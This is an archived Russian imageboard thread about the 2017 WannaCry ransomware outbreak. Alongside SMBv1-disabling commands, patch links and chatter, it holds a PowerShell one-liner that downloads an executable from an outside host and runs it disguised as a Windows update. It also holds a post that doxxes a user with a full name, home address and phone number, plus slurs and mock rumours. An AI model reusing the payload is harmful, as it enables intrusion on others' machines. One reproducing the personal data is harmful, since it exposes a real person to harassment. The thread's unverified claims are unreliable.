24 декабря Архивач восстановлен после серьёзной аварии. К сожалению, значительная часть сохранённых изображений и видео была потеряна. Подробности случившегося. Мы призываем всех неравнодушных помочь нам с восстановлением утраченного контента!
Запустил от имени админа но теперь вообще ноль реакции на команду так и должно быть. это нормальное поведение. Говорит о том, что команда применилась
Для Windows 10 Третий пик в ОП посте --------------------------------- КАК БОРОТЬСЯ, ЕСЛИ УЖЕ ЗАРАЖЕН:
1. НЕ ПЕРЕЗАГРУЖАЙТЕ КОМПЬЮТЕР! 2. НЕ ЗАПУСКАЙТЕ .exe ФАЙЛЫ, СКАЧАННЫЕ В МАЕ 3. ОБНОВИТЕ АНТИВИРУС И ПОСТАВЬТЕ СКАНИРОВАНИЕ ВСЕЙ СИСТЕМЫ -------------------------------- Про ВИРУС, распространение и история: Появился набор эксплоитов FuzzBunch, который группа хакеров Shadow Brokers украла у Equation Group, хакеров из Агенства Нац. Безопасности США. Microsoft потихому прикрыла дырки обновлением MS 17-010, возможно самым важным обновлением за последние десять лет. В то время как набор эксплоитов уже неделю лежит в открытом доступе https://github.com/fuzzbunch/fuzzbunch с обучающими видео. В этом наборе есть опасный инструмент DoublePulsar. Если кратко, то если открыт 445 порт и не установлено обновление MS 17-010, то DoublePulsar простукивает этот порт, делает перехваты системных вызовов и в память внедряет вредоносный код.
ХАКЕР WHITEHAT ИТТ! РАССКАЗЫВАЮ КАК ЭТО РАБОТАЕТ. ВСЕМ ВНИМАТЕЛЬНО СЛУШАТЬ.
У тех кто начал эту атаку есть
>Эксплойты слитые Shadow brokers >Сканнер сети который они сами написали на C/Python >Linux сервер
Как это работает?
>Скрипт сканнера запускается на Linux сервере >Вбивается определенный IP диапазон или целая страна >Скрипт сканирует диапазон на открытый 445 порт >В случае удачного обнаружения SMB сервиса, посылает эксплойт, вызывающий переполнение буфера >эксплойт закачивает файл и запускает его.
КАК ХАКЕРЫ ДЕЛАЮТ ТАК, ЧТОБ СЕРВЕР СКАНЕРА НЕ ПАЛИЛСЯ?
В Сетевом стэке Linux допущено изменять IP Header-ы исходящих пакетов. При сканировании их программа заменяет адрес на рандомный, поэтому настоящий адрес сканера никогда не фиксируется. --------------------------------- Интерактивная карта распространения вируса в режиме реального времени https://intel.malwaretech.com/WannaCrypt.html - это карта страдающих пидарах по всему миру --------------------------------
Майкрософт в обновлении подсунула БЭКДОР и теперь за вами будут следить (информация проверяется в надежных источниках)
Виновата в виросной атаке - Монголия, Канада и ряд стран Африки (Заключение полузависимого диванного эксперта из Текстильщиков)
Уязвимы только компьютеры под управлением ОС Windows 7-10, пользователи МАКоси и Линукс могут спать спокойно (эксперты из треда оспаривают это заключение) --------------------------------- СОТРУДНИКИ ПОЛИЦИИ БУГУРТЯТ ИЗ-ЗА ВИРУСА В ВК: https://vk.com/wall-28464698_720473 --------------------------------- В треде присутствует группа анонов, которые пошли в отрицалово и не верят в существование вируса, так же пытаются оспорить заявление СМИ и Лаборатории Касперского (Хотя уже пруфов было столько, шо пиздец). По неподтвержденным данным (информация проверяется) это дело рук Нэвэльного. --------------------------------- Позиция Анатолия ШАРИЯ по этому вопросу:
Тут дело скорее не в каких то хакеров из-за океана, а просто Украина решила таким образом отомстить России за Донбасс. Хотя сколько можно им говорить, что Россияне принимает участия в конфликте на востоке Украины и то, что жители путем референдума сделали свой выбор отсоединения от незалэжной. Суть вируса в том, что бы просто навести панику, которой не поддается общество. Ведущие it специалисты России прямо сейчас решают эту проблему и очень успешно. ---------------------------------- ПОЗИЦИИ РУССКИХ РЭППЕРОВ по данному вопросу.
Витя СД - сидит итт и активно поддерживает пострадавших от вируса.
Павел Техник - пожелал лично расправиться с хакерами физически.
Галат - предложил ОБОССАТЬ ХАКЕРОВ, а не сидеть на жопе.
Хованский - предлагает больно и унизительно ПОКАРАТЬ ИХ СВОЕЙ ЕЛДОЙ.
Саша Скул - предложил наказать ОХУЕВШИХ ПРОГРАММИСТОВ.
СЛАВА КПСС ХРАНИТ МОЛЧАНИЕ.
Шокк - высрал два невнятных твита.
ОКСИМУРОН - В панике, плачет в вк, т.к. зашифрованы все треки
НОЙЗ МС - Надеется что двач остановит этот хаос
ЛАРИН - Нервно покуривает, т.к. зашифровалось 400 гб с ЦП
-------------------------------- АНОН, ВНИМАНИЕ!! Зайдите в командную строку, наберите sc query mrxsmb10 Если написано RUNNING, то нихуя вы не отключили SMB.
Отключается так: запускаем командную строку от админа и пишем: sc config lanmanworkstation depend= bowser/mrxsmb20/nsi
У меня вопрос: почему после этого: >Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" SMB1 -Type DWORD -Value 0 -Force я ввёл команду >sc query mrxsmb10 и был статус running? Ведь по идее должно было отключиться?
Так как защититься? Первый способ это заблокировать порты фаерволом. Может не сработать.
Второй спосособ это установить патч MS17-010, который закроет уязвимость.
Третий способ для тех, кто не хочет устанавливать патчи. Нужно отключить службу smb1.
Что такое smb?
>>153089914 Есть у всех, нужно чтоб лазить по папочкам расшаренным в свободный доступ и просто общим папкам в локальной сети. По умолчанию включено, если не выпелено из дестрибутива.
Проверить включен ли smb1: >>153088601 Зайдите в командную строку, наберите sc query mrxsmb10 Если написано RUNNING, то нихуя вы не отключили SMB.
>>153099359 >ЕСЛИ ТЫ НЕ ИГРАЕШЬ В ИГОРИ Смотря в какие игори. Индюшня почти полным составом на лине есть. Большая часть старых игр (до ~2013) без всяких сильных шаманств в винце заводятся.
а моя история такая. посетил меня вирус. после его уничтожения стала смотреть что выжило. папку фото все убил, кроме формата раф. где хранились 3дешки не тронул ни текстуры, ни рендеры, хотя в jpeg. фото с телефона так же не тронул..хотя поубивал все на 2х дисках, диск с не тронул. запустила recuva, находит 488000 файлов, тьма фото. но пока восстановить не пробовала, не знаю где память брать..так что такая история
>>153099175 >>153099159 Почему все советуют какую-то хуйню вместо того чтобы просто установить обновления? Они бы еще посоветовали сетевой шнур из блока питания выдернуть - тогда точно не заразишься.
>>153100334 Кааак? Вот скажи что у тебя за система, гуляй не хочу. Трудно купить лицуху касперыча, хуй с нм винда пиратская. Но что бы юзверь пострадал, это надо самому купить вирус и запустить на пеке.
>>153100646 Дружише как с эти можно смерится, детские фото ребенка, фото свадьбы, калекция музыки 127 тысяч песен, робота в тексте за 22 года, 3 ТБ информации.
>>153100780 Провайдер может все что угодно, но ему лень и похуй. К тому же возможно некоторым клиентам порты нужны. Алсо бытовые роутеры в режиме NAT по умолчанию блочат порты.
>>153098971 (OP) Ебать у пиратодаунов и дегенератов ФАЕРВОЛЛ НИ НУЖОН катастрофа лол. Мимо сижу за фанрволлом на последнем апдейте божественной десятки
>>153098971 (OP) Антоны, случилась странная хуйня: позаачера был в деревне в орловской области. Связи там, кроме еблайна хуй да нихуя. Модем в ноут еблайновский не втыкал. Ноут лежал на подоконнике ночь. И после включения и выключения затребовал времени на обновление и обновился как-то. То же сделала сегодня и пека но уже через кабель и. ДС. Винда 10. Обновилась и там и на пеке с 7 корпоративной. Меня интересует ситуация с ноутом. Как? В доступности были 2 телефона, изредка включал передачу мобильных данных, вай-вай не расшаривал.
>>153101390 Бро, 7-10означает что и 7 и 8 и 8.1 и 10 Винду, или же только 7 и 10. Я просто чето очкую заразится, и что делает вирус то сам шифрует удаляет? Просто есть на компе бесценные для моей семьи фоты и вот страшновато стало
>>153101448 São Paulo Court of Justice (Brazil)[55] Vivo (Telefônica Brasil) (Brazil)[55] Lakeridge Health (Canada)[56] PetroChina (China)[16] Public Security Bureaus (China)[57] Sun Yat-sen University (China)[58] Instituto Nacional de Salud (Colombia)[59] Renault (France)[60] Deutsche Bahn (Germany)[61] Telenor Hungary (Hungary)[62] Andhra Pradesh Police (India)[63] Dharmais Hospital (Indonesia)[58] Harapan Kita Hospital (Indonesia)[58] University of Milano-Bicocca (Italy)[64] Q-Park (The Netherlands)[65] Portugal Telecom (Portugal)[66] Automobile Dacia (Romania)[67] Ministry of Foreign Affairs (Romania)[68] MegaFon (Russia)[69] Ministry of Internal Affairs (Russia)[70] Russian Railways (Russia)[71] LATAM Airlines Group (Chile)[72] Banco Bilbao Vizcaya Argentaria (Spain)[73] Telefónica (Spain)[73] Sandvik (Sweden)[58] Garena Blade and Soul (Thailand)[74] National Health Service (England) (United Kingdom)[75][12][10] NHS Scotland[12][10] Nissan UK (United Kingdom)[75] FedEx (United States)[76]
>>153100646 >2017 >касперский от сетевых угроз >верить что лицуха спасет твой анус от вируса, рака, хуев, аллаха >>>153100727 > сетевой шнур в МАТЕРИНКУ ВТЫКАЕТСЯ > В 2017 быть тупым это модно
>>153101892 У меня есть консоль. Но играть на ней в игры, которые есть на пека - говноедство, потому что управление хуже, графон хуже, еще и в 30 фпс. Таким людям нужно прописать принудительную эвтаназию.
>>153101946 Так сонсольки не блочат жеж. Сейчас обнову на хкоробку первую под мышь и клаву завезут, домашнюю пеку и включать не буду. Под файлохранилище оставлю.
ребят,незнаю,заразился ли я этим вирусом,или нет,но у меня есть процесс svchost.exe который практически загружает процессор на 100%,из-за этого лагает комп,и игры,я завершаю этот процесс,и лаги убираются. не знаете что делать? винда 7 пиратка конечно..обнова защиты 445 порта,не ставится,антивирь авира ничего не замечала..думаю скоро словлю этот вирусняк..
>>153101984 У тебя сонсоль , видимо, старая. А про ФПС и игори от васяна с торрентов - моя x one стоила в 14 году с гоночками и футбиком 17400. Сейчас на эти деньги и планку оперативы не купишь. По поводу ФПС, 99% школоты обновляют процессор, денег на нормальный монитор, а он стоит половину хорошего процессора, т.е. ок. 50.000 не остается. Ну кроме фигуркоеба, если ты понял, о ком я.
У меня сейчас домашний комп - моноблок msi, купленный в 2011 году. Установлена Win7 с завода. До сих пор все работает ништяк, никаких вирусов и проблем нет. Самба расшарена по домашней сети для телевизоров и мобильных устройств. Что я делаю не так?
>>153098971 (OP) >Зайдите в командную строку, наберите sc query mrxsmb10 >Если написано RUNNING, то нихуя вы не отключили SMB. Если написано RUNNING, но я установил ОБНОВЛЕНИЕ, то это норм, или надо всё равно откл. SMB?
>>153102693 >Скрипт сканнера запускается на Linux сервере >Вбивается определенный IP диапазон или целая страна >Скрипт сканирует диапазон на открытый 445 порт >В случае удачного обнаружения SMB сервиса, посылает эксплойт, вызывающий переполнение буфера >эксплойт закачивает файл и запускает его.
>>153102619 У меня пс4 не про, если ты об этом. Я торрентами не пользуюсь. И вообще у тебя речь какая-то хуевая. Единственный проц за 100к - это 10 ядерник прошлого поколения, который сосет болт у 4 ядерника кебилейка за 25к.
>>153102761 И лечитса только установкой обновы через центр обновления виндовс либо доп командами? Если у меня стоит 8 винда и обновления установлены то все норм? Я просто неочень умный
>>153103536 Привет, это я (1-й пик). Дорогой ОПушка. Я не совсем игро дебил, мне даже линукс больше нравится, чем шындоус. Но я вынужден остаться на сперме. Вот почему: 1. Игры на вайне нормально не поиграешь. Хотя помню outlast вполне на высоких игрался на win-е. (intel core i5 2320M GT 520M 4GB ОЗУ) 2. Дебиан заранее устаревшее говно, а компилировать ядро и собирать пакеты у меня не получается, лол. (Мб киньте гайд, научусь на виртуалке). Арч - не дружит с моим UEFI. GRUB просто не хочет ставиться. Не видит EFI раздел. Суська - ассоциируется с неповоротливой, железной, огромной рептилией. Запускается долго и прочие радости. Федора - нестабильное говно. Недавно ставил себе на замену шындоусу, так там сразу юзеры отвалились, да и dnf тоже. Когда еще был ноут, не дружило с моей GT 520M Генту - у меня не так много времени, чтобы пердолиться. Бубунта - не линукс 3. У меня халявная сперма. (2-й пик. Шарага участвует в DreamSpark-е.) 4. Линух багованее, чем шындоус. Это факт. 5. Софта не завезли. LibreOffice не достал и возможно так и не достанет до уровня Microsoft Office. Krita вроде нормальная замена PS, но сам не юзал. Ну вот всяких замен Dreamweaver-у и Muse-у - нет. На вайне, чтобы это все заработало, нужно сильно пердолиться. ================ Может вы мне порекомендуете дистр? Слезу,как пройду тургор.
>>153103982 >Хотя помню outlast вполне на высоких игрался на win-е аутласт нативно есть >Дебиан заранее устаревшее говно А ты ставь тестинг/анстейбл >Линух багованее, чем шындоус. Это факт. Нет. >LibreOffice не достал и возможно так и не достанет до уровня Microsoft Office Опять таки спорное утверждение. Если уровень поддержки говна типа doc/docx/xls/xlsx/ppt/pptx, то да. Но тоже самое можно сказать и в обратку.
>>153104195 >аутласт нативно есть В то время не был. >А ты ставь тестинг/анстейбл Все равно устаревшее говно. >Нет. Cамому себе не ври. >Если уровень поддержки говна типа doc/docx/xls/xlsx/ppt/pptx, то да. Но тоже самое можно сказать и в обратку. С обраткой более нормально.
>>153103982 Виртуальку ставь с вордом и игрушками, если так дрочишь на швабодку
Грамотно настроенная семерка (отключены все сервисы кроме 11 жизненнонеобходимых) прекрасно себя показывает, разумеется, я ее никогда не обновлял. Есть дырки во всех внутренних местах, сидеть на семерке равноценно сидеть под рутом на никсе, такое только для личного пользования
п.с. добавьте пик в шапку, думаю, он много кому пригодится
>2015 бесплатная обнова до 10 Кокококоо не буду обновляться, мне вставят зонд слежки в анал пизда цру фсб ептвою мать следят следят памагити >2017 Сука блять данные зашифрованы не спасли ебаные микромягкие мрази уебки чурки блять
>>153104900 >Кокококоо не буду обновляться, мне вставят зонд слежки в анал пизда цру фсб ептвою мать следят следят памагити напиши в тред свои ФИО, место рождения, адрес, где учишься, где рабоатешь, аналогичные данные родителей
я писал только на плюсах под сокеты либ Qt/boost, как делать финты с подменой понятия не имею Может, возмешь в ученики? тебе все равно делать нехуй раз ты здесь
>>153104981 Мало ли какой код, хуёвый китаец сделал программу с друзьями, и кинул по приколу через дыру, которые Microsoft сами же и оставили, для внезапной анальной карнавалии с жопами врагов народа, по просьбе ЦРУ.
>>153105049 Даже если допустить, что микрософт собирает мои данные, то они отправляются к дяденькам в погонах, которые не разглашают их на двачи. А ты пидор и конспиролог, шапочка из фольги на голове?
>>153105278 Им дали СПО дали пинусы всех мастей , торы-хуеры с i2p и нетсуки нет блядь мы товарищам майорам жопы подставим , зато на сосаке будем орать что мы анонимны
>>153105308 >Сталкер Он из коробки в винце бегает без всяких допиливаний почти как нативный. Сам уже года четыре играю в него так. А вот с модами типа огсе0693 или ЛА уже нужно установить то, что им нужно — дотнеты всякие с визуал с++ редистрибутейбл. Можно через специальный скрипт для централизованной установки подобного говна сделать.
>>153105278 >дяденькам в погонах С чего ты взял что они не будут тебя ими шантажировать? Той же публикацией на дваче. >которые не разглашают их на двачи Даже если предположить что ты всю жизнь будешь послушной овечкой, они их просто проебут случайно как было уже дохуя раз. Они свои эксплойты не собирались разглашать, а мы на двачах смотрим исходники и проигрываем с того что в ЦРУ работают битарды-пониебы >А ты пидор и конспиролог, шапочка из фольги на голове? С чего ты взял что ничего плохого не проиходит, а любой кто утверждает обратное - конспиролог? Зачем они тратят миллиарды долларов на всю эту хрень? Они тебе бекдор даже в процессор вставили, лол.
КОРОЧЕ ТАК, БЛЯДЬ, ПОЯСНЯЮ ОДИН И ЕДИНСТВЕННЫЙ РАЗ тем, кто все равно ссыт
Берете все свои дохуяважныефайлы и меняете рачширение у них на *.2ch Или на еще какое говно. Можете даже по дефолту настроить в винде, дабы оная открывала эту поебень тем, чем надо. Ждете пока хайпанутый локер ВСЕ. ??? Профит.
>>153105896 >локер ВСЕ Ахахах лол , это только начало , это был тестовый прогон , погодь сейчас аноны из дарквеба вылезут , они то явно такой куш не отпустят
>>153106006 Если ты про то, захуя им дополнительное дерьмо: - у огсе есть есть свой лаунчер, который написан на дотнете, плюс движок ковыряли что-то взяли из msvc библиотек - у ЛА движок дописывали/переписывали и собирали под свежее msvc дерьмо Можно это всё ставить как и на винде. Всё будет работать и не кашлять. С поправкой на то, что это моды от любителей и они имеют свойство вылетать и тормозить на ЛЮБОМ конфиге даже под виндой.
>>153106033 Ой вот блядь только не надо затирать, что это криптоговно распознает .jpg , у которого расширение .пизда Это просто ебанись какой вирус должен быть
Да вы блядь охуели? 36 тредов?! Что, блядь, изменилось в мире, что всех вдруг стал сказочно ебать какой-то там шифровальщик? Вирусы шифровальщики и до этого вашего ванакрая были крайне популярны, ещё в 2013м была нехуёвая такая эпидемия. По 445му порту лезет? Да божечки ты мои! По нему, блядь, кто только не лезет! Тот же сассер к примеру, из далёкого 2004го, блядь! Все, кому не похую на безопасность, обычно перво наперво рубили к хуям левые порты типа 445, 135 е.т.ц. Опять же особо этот ваш ваннакрай никак себя не проявил, 160к заражений? Да ебитесь вы конём, опять же сассер только в первый день зашкварил более 250к машин, а уж до славы конфликера, этому вашему школоподелию, как до китая раком. Ёбаный макакораковник вконец скатился до уровня ссаных бложеков.
>>153106601 > Некоторые ссут подобных сервисов Криптуешь 100гб цопэ и план свержения путлера Закидываешь на облако Никто кроме тебя не может ничего с этими файлами сделать включая товарища майора ... Профит
>>153107740 Вообще ахуели ... К примеру в моём ригионе пройвайдеры держат логин в формате домулицаквартира , то есть все что нужно тебе это распарсить веб морду роутера
Короче, сижу на 10ке, проебал ключ и активировал KMSом, обновления включены, роутера нет, стоит есет смарт секьюрити, но не лицензия, что мне угрожает? Все боюсь, что кто то может просматривать мои файлы, ну не майки, а вообще левый анон или как то подключится к моей сети, это может произойти?
>>153108376 Большой брат следит за тобой , хватит сука лазит по роутерам , гавнук хуев , заебали каждую неделю слышу что у кого инет не робит вот из за таких рукожопых как ты
Допустим, есть доступ к роутеру, Что можно делать с компами, которые в сети, кроме подмены и прочего Прямой пейлоад можно отправить ? powershell (new-object System.Net.WebClient).DownloadFile('ebalo.com/hui.exe','%TEMP%\windows10update.exe') %TEMP%\windows10update.exe
>>153108658 Ну приступим, Юрий Семёнов. Как там в Уссурийске по адресу ул. Советская, 103 поживается? Добродушный Антон может связаться с тобой в ближайшие дни по +7-4234-344513 или же по zip-коду 692525?
>>153098971 (OP) Что делает это SMB? Если я его отключу, то что перестанет работать? Я это замечу? Или он почти не нужен? Что будет с моим компьютером, если я закрою порты? Я замечу это? Столкнусь с какими-то ограничениями?
До меня дошло. Мы все глупцы. Эта версия с килсвичем, которую остановили зарегав блаблабла.ком - она не основная. Основная версия ЗАПУСТИТСЯ когда зарегают блаблабла.ком. И все эти 230к заражений на карте - это старые версии.
>>153103982 >1. Игры на вайне нормально не поиграешь. Хотя помню outlast вполне на высоких игрался на win-е. (intel core i5 2320M GT 520M 4GB ОЗУ) Wine вообще костыль. >2. Дебиан заранее устаревшее говно, а компилировать ядро и собирать пакеты у меня не получается, лол. (Мб киньте гайд, научусь на виртуалке). Debian sid, но дебиан в целом для серверов. >Арч - не дружит с моим UEFI. GRUB просто не хочет ставиться. Не видит EFI раздел. Manjaro >Суська - ассоциируется с неповоротливой, железной, огромной рептилией. Запускается долго и прочие радости. Gecko linux >Федора - нестабильное говно. Недавно ставил себе на замену шындоусу, так там сразу юзеры отвалились, да и dnf тоже. Когда еще был ноут, не дружило с моей GT 520M Тру. + DNF - медленный шо пиздец. >Генту - у меня не так много времени, чтобы пердолиться. Тру >Бубунта - не линукс Тру >4. Линух багованее, чем шындоус. Это факт. Не тру. Все от того как приготовишь. >5. Софта не завезли. Не тру. >LibreOffice не достал и возможно так и не достанет до уровня Microsoft Office. Тру >Krita вроде нормальная замена PS, но сам не юзал. Krita скорее рисовалка. Очень качественная но рисовалка, а не полноценный редактор. GIMP - антигуманная хуита. Так что да, фотошопу замены нет.
>>153098971 (OP) уже 4 года сижу на "голой" винде без антивируса. Интернет за роутером, немного "тюнинга" - спокойно лазию где хочу, никогда ничего не ловил. Опыт в ИБ лучше любой "засчиты"
Ответь внятно. если не качать всякое говно, а просто скролить двач и вкшечку заразится реально? или оно пролазит само даже если комп просто подключен к вифи?
>>153108075 Не суть важно. Побаловались и хватит. А то вы сейчас у всей страны начнете роутеры перезагружать, а там сидит на другом конце света тетка типа моей матери, и ей придетмя отдать мастеру тыщи полторы за настройку роутера.
>>153110299 Хуй знает. Теорему пифагора попробуй. АК=5 из АВ и АК по пифагору ВК найди. из ВК и ВД находишь Х по пифагору. Дальше Х умножаешь на АК и делишь на 2 - будет площадь.
В общем, понял, я анально огорожен. Отключил все удаленное управление, порты закрыты, есет работает, 10ка с обновлениями, роутера нет, если и заражусь, то открыв екзешник и не сняв галки
>>153098971 (OP) >Уязвимы только компьютеры под управлением ОС Windows 7-10 Вы оскорбляете чувства некрофилов, мелкомягкие,например, даже патч выпустили под ХП.
по совместительству являюсь админом в двух конторах на 55 компов примерно. но почему-то сейчас для меня самОе гЛаВнОе ЭтО МОЯ ЖОПА В ПРЕДСТОЯЩЕМ ДАЛЬНЯКЕ. УГАДАЙТЕ ПОЧЕМУ?
>>153098971 (OP) Если только отключить SMB и больше нихуя не делать, то я защищен НА 100%?. при условии, что не скачиваю экзешники из непроверенных источников
Число зараженных компьютеров ежечасно застет с громадной скоростью.
ТРЕД №36
Первый тред: https://2ch.hk/b/res/152930021.html
Второй тред : https://2ch.hk/b/res/152936528.html
Третий тонет https://2ch.hk/b/res/152941163.html
и т.д.
35 тред тонет тут https://2ch.hk/b/res/153082270.html
-------------------------------
ПРЕДИСЛОВИЕ:
_____
Началось массовое заражение криптовирусом по всему миру. На данный момент известно о больницах в Лондоне, ГИБДД и МВД России, Мегафоне. Запасаемся попкорном и ждем развития событий.
https://nation-news.ru/264825-virus-zakralsya-v-informacionnuyu-sistemu-gibdd-istochnik
https://meduza.io/news/2017/05/12/v-britanskih-bolnitsah-odnovremenno-proizoshel-tehnicheskiy-sboy-hakery-zablokirovali-kompyutery-i-trebuyut-vykup
http://m.pikabu.ru/story/kriptoshifrovalshchik_porazil_set_mvd_5044435
------------------------------------
ИСПРАВЛЕНИЯ, ЗАТЫКАЮЩИЕ ДЫРЫ В ВИНДЕ 7
http://www.catalog.update.microsoft.com/Search.aspx?q=4012215
http://www.catalog.update.microsoft.com/Search.aspx?q=4012212
-----------------------------------
Для Windows 7: SMBv1 отрубается на семёре через ps командой
(запускать от имени администратора)
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" SMB1 -Type DWORD -Value 0 -Force
Запустил от имени админа но теперь вообще ноль реакции на команду
так и должно быть. это нормальное поведение. Говорит о том, что команда применилась
Для Windows 10
Третий пик в ОП посте
---------------------------------
КАК БОРОТЬСЯ, ЕСЛИ УЖЕ ЗАРАЖЕН:
1. НЕ ПЕРЕЗАГРУЖАЙТЕ КОМПЬЮТЕР!
2. НЕ ЗАПУСКАЙТЕ .exe ФАЙЛЫ, СКАЧАННЫЕ В МАЕ
3. ОБНОВИТЕ АНТИВИРУС И ПОСТАВЬТЕ СКАНИРОВАНИЕ ВСЕЙ СИСТЕМЫ
--------------------------------
Про ВИРУС, распространение и история:
Появился набор эксплоитов FuzzBunch, который группа хакеров Shadow Brokers украла у Equation Group, хакеров из Агенства Нац. Безопасности США.
Microsoft потихому прикрыла дырки обновлением MS 17-010, возможно самым важным обновлением за последние десять лет.
В то время как набор эксплоитов уже неделю лежит в открытом доступе https://github.com/fuzzbunch/fuzzbunch с обучающими видео.
В этом наборе есть опасный инструмент DoublePulsar.
Если кратко, то если открыт 445 порт и не установлено обновление MS 17-010, то DoublePulsar
простукивает этот порт, делает перехваты системных вызовов и в память внедряет вредоносный код.
https://geektimes.ru/post/289115/
----
Еще про распространение:
ХАКЕР WHITEHAT ИТТ! РАССКАЗЫВАЮ КАК ЭТО РАБОТАЕТ. ВСЕМ ВНИМАТЕЛЬНО СЛУШАТЬ.
У тех кто начал эту атаку есть
>Эксплойты слитые Shadow brokers
>Сканнер сети который они сами написали на C/Python
>Linux сервер
Как это работает?
>Скрипт сканнера запускается на Linux сервере
>Вбивается определенный IP диапазон или целая страна
>Скрипт сканирует диапазон на открытый 445 порт
>В случае удачного обнаружения SMB сервиса, посылает эксплойт, вызывающий переполнение буфера
>эксплойт закачивает файл и запускает его.
КАК ХАКЕРЫ ДЕЛАЮТ ТАК, ЧТОБ СЕРВЕР СКАНЕРА НЕ ПАЛИЛСЯ?
В Сетевом стэке Linux допущено изменять IP Header-ы исходящих пакетов. При сканировании их программа заменяет адрес на рандомный, поэтому настоящий адрес сканера никогда не фиксируется.
---------------------------------
Интерактивная карта распространения вируса в режиме реального времени
https://intel.malwaretech.com/WannaCrypt.html - это карта страдающих пидарах по всему миру
--------------------------------
КОШЕЛЬКИ ХАКЕРОВ
https://blockchain.info/address/13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94
https://blockchain.info/address/12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw
https://blockchain.info/address/115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
--------------------------------
НЕ ПОДТВЕРЖДЕННЫЕ ДАННЫЕ:
Майкрософт в обновлении подсунула БЭКДОР и теперь за вами будут следить (информация проверяется в надежных источниках)
Виновата в виросной атаке - Монголия, Канада и ряд стран Африки (Заключение полузависимого диванного эксперта из Текстильщиков)
Уязвимы только компьютеры под управлением ОС Windows 7-10, пользователи МАКоси и Линукс могут спать спокойно (эксперты из треда оспаривают это заключение)
---------------------------------
СОТРУДНИКИ ПОЛИЦИИ БУГУРТЯТ ИЗ-ЗА ВИРУСА В ВК:
https://vk.com/wall-28464698_720473
---------------------------------
В треде присутствует группа анонов, которые пошли в отрицалово и не верят в существование вируса, так же пытаются оспорить заявление СМИ и Лаборатории Касперского (Хотя уже пруфов было столько, шо пиздец). По неподтвержденным данным (информация проверяется) это дело рук Нэвэльного.
---------------------------------
Позиция Анатолия ШАРИЯ по этому вопросу:
Тут дело скорее не в каких то хакеров из-за океана, а просто Украина решила таким образом отомстить России за Донбасс. Хотя сколько можно им говорить, что Россияне принимает участия в конфликте на востоке Украины и то, что жители путем референдума сделали свой выбор отсоединения от незалэжной. Суть вируса в том, что бы просто навести панику, которой не поддается общество. Ведущие it специалисты России прямо сейчас решают эту проблему и очень успешно.
----------------------------------
ПОЗИЦИИ РУССКИХ РЭППЕРОВ по данному вопросу.
Витя СД - сидит итт и активно поддерживает пострадавших от вируса.
Павел Техник - пожелал лично расправиться с хакерами физически.
Галат - предложил ОБОССАТЬ ХАКЕРОВ, а не сидеть на жопе.
Хованский - предлагает больно и унизительно ПОКАРАТЬ ИХ СВОЕЙ ЕЛДОЙ.
Саша Скул - предложил наказать ОХУЕВШИХ ПРОГРАММИСТОВ.
СЛАВА КПСС ХРАНИТ МОЛЧАНИЕ.
Шокк - высрал два невнятных твита.
ОКСИМУРОН - В панике, плачет в вк, т.к. зашифрованы все треки
НОЙЗ МС - Надеется что двач остановит этот хаос
ЛАРИН - Нервно покуривает, т.к. зашифровалось 400 гб с ЦП
--------------------------------
АНОН, ВНИМАНИЕ!!
Зайдите в командную строку, наберите sc query mrxsmb10
Если написано RUNNING, то нихуя вы не отключили SMB.
Отключается так: запускаем командную строку от админа и пишем:
sc config lanmanworkstation depend= bowser/mrxsmb20/nsi
sc config mrxsmb10 start= disabled
перезагружаемся и проверяем той же командой.